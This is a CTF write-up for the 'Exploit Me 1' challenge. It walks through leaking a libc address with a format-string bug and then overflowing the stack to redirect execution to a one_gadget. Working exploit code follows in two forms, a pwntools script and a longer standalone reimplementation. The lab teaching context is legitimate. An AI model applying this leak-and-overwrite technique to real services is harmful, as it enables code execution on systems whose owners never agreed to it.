
Exploit Me 1 (LoTuX CTF)

Author: 堇姬Naup

asm

The program takes two inputs: first a format string (fmt), then the "one_gadget" input. To use a one_gadget we need the libc base, and the format string bug gives us a way to leak it.


One_gadget

Look at the one_gadget first. It has the following constraints:
rsi == NULL
rdx == NULL
rbp-0x78 writable


Notice that the function ends with two xor instructions that zero rsi and rdx, so the first two constraints are already satisfied. What remains is making rbp-0x78 writable: since the saved rbp we overwrite is popped back into rbp by `leave` before the return, we just pick any writable address and put it in the saved rbp slot.

Solution

First, leak libc.
After a little trial and error, %9$p prints a libc address, which can be used to recover the libc base.
offset = 0x29d90 (the leaked address minus the libc base)


Start with b'a'*0x10 (16 bytes, as in the script) to fill the buffer up to the saved rbp.

Because PIE is enabled, it is easier to use an unused writable region inside libc than one in the binary, since we already have the libc base. The address chosen here, expressed as an offset from the libc base:

0x7ffff7e1a2c0-0x7ffff7c00000=0x21a2c0


That address goes into the saved rbp slot, and the return address is set to the one_gadget, offset 0xebc88.

Note: anything taken from libc (the one_gadget, the writable slot) must have the libc base added to it.

script

```python
from pwn import *

r = process('./chal')

libcoffset = 0x29d90          # value leaked by %9$p minus the libc base
onegadget_offset = 0xebc88    # one_gadget: needs rsi == rdx == NULL and rbp-0x78 writable

# 1. Format string leak -> libc base
r.sendlineafter(b'Give Me FMT > ', b'%9$p')
leak_libc = int(r.recvline().strip().decode(), 16)
libc_base = leak_libc - libcoffset
onegadget = onegadget_offset + libc_base
writeable = 0x21a2c0 + libc_base   # unused writable slot in libc; becomes rbp after leave
print(hex(leak_libc))

# 2. Overflow: padding up to saved rbp | fake rbp (writable) | return address (one_gadget)
payload = b'a' * 0x10 + p64(writeable) + p64(onegadget)
r.sendlineafter(b'Give Me One Gadget > ', payload)
r.interactive()
```
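The same exploit logic without pwntools, as an added example that is not the writeup author's script. It covers both halves of the solution above: turning the %9$p leak into a libc base, and building the saved-rbp/one_gadget payload. The offsets are the ones from the writeup; the page-alignment check on the libc base, the `fake_rbp_is_safe` check against a writable mapping range (which you would read from `vmmap` or `info proc mappings` in the debugger), the `exploit` driver and the constructed transcript in `__main__` are assumptions added for illustration.

```python
import re
import struct

# Offsets taken from the writeup; the surrounding code is an added example.
LIBC_LEAK_OFFSET = 0x29d90      # %9$p prints libc_base + this
ONE_GADGET_OFFSET = 0xebc88     # one_gadget: rsi == rdx == NULL, [rbp-0x78] writable
WRITABLE_OFFSET = 0x21a2c0      # unused writable slot in libc (0x7ffff7e1a2c0 - 0x7ffff7c00000)
PAD_LEN = 0x10                  # bytes from the start of the buffer to the saved rbp
PAGE_SIZE = 0x1000


def p64(value):
    """Pack as little-endian 64-bit, same as pwntools' p64."""
    return struct.pack("<Q", value)


def libc_base_from_leak(leak_line):
    """Turn the line printed for '%9$p' (e.g. b'0x7ffff7c29d90\\n') into the libc base.

    A libc base is always page aligned; if the result is not, the %N$p index or
    the offset is wrong, so fail here instead of sending a payload that crashes."""
    if isinstance(leak_line, bytes):
        leak_line = leak_line.decode()
    m = re.search(r"0x[0-9a-fA-F]+", leak_line)
    if m is None:
        raise ValueError("no pointer in leak output: %r" % leak_line)
    base = int(m.group(0), 16) - LIBC_LEAK_OFFSET
    if base & (PAGE_SIZE - 1):
        raise ValueError("libc base %#x is not page aligned: wrong offset or index" % base)
    return base


def fake_rbp_is_safe(fake_rbp, rw_start, rw_end):
    """Check the gadget's 'rbp-0x78 writable' constraint against a writable
    mapping [rw_start, rw_end) taken from the debugger (assumed input).
    Conservatively require the whole [rbp-0x78, rbp] window to lie inside it."""
    return rw_start <= fake_rbp - 0x78 and fake_rbp <= rw_end


def build_payload(libc_base):
    """Stack layout after the overflow: buffer | saved rbp | return address.
    saved rbp -> writable libc slot (satisfies the gadget), ret -> one_gadget."""
    fake_rbp = libc_base + WRITABLE_OFFSET
    one_gadget = libc_base + ONE_GADGET_OFFSET
    return b"a" * PAD_LEN + p64(fake_rbp) + p64(one_gadget)


def exploit(recv_line, send_line):
    """Drive the two prompts. recv_line/send_line abstract the I/O so the same
    logic works with a pwntools tube (recvline/sendlineafter) or a raw socket."""
    send_line(b"%9$p")                      # answer to 'Give Me FMT > '
    libc_base = libc_base_from_leak(recv_line())
    send_line(build_payload(libc_base))     # answer to 'Give Me One Gadget > '
    return libc_base


if __name__ == "__main__":
    # Constructed transcript: the service answers the fmt prompt with a leak.
    answers = [b"0x7ffff7c29d90\n"]
    sent = []
    base = exploit(answers.pop, sent.append)
    print(hex(base), sent[-1].hex())
```

With a live target, pass `r.recvline` and `r.sendline` (or wrappers around `r.sendlineafter` for the two prompts) to `exploit`; the alignment check is what tells you early that the `%9$p` index or the 0x29d90 offset does not match the remote libc.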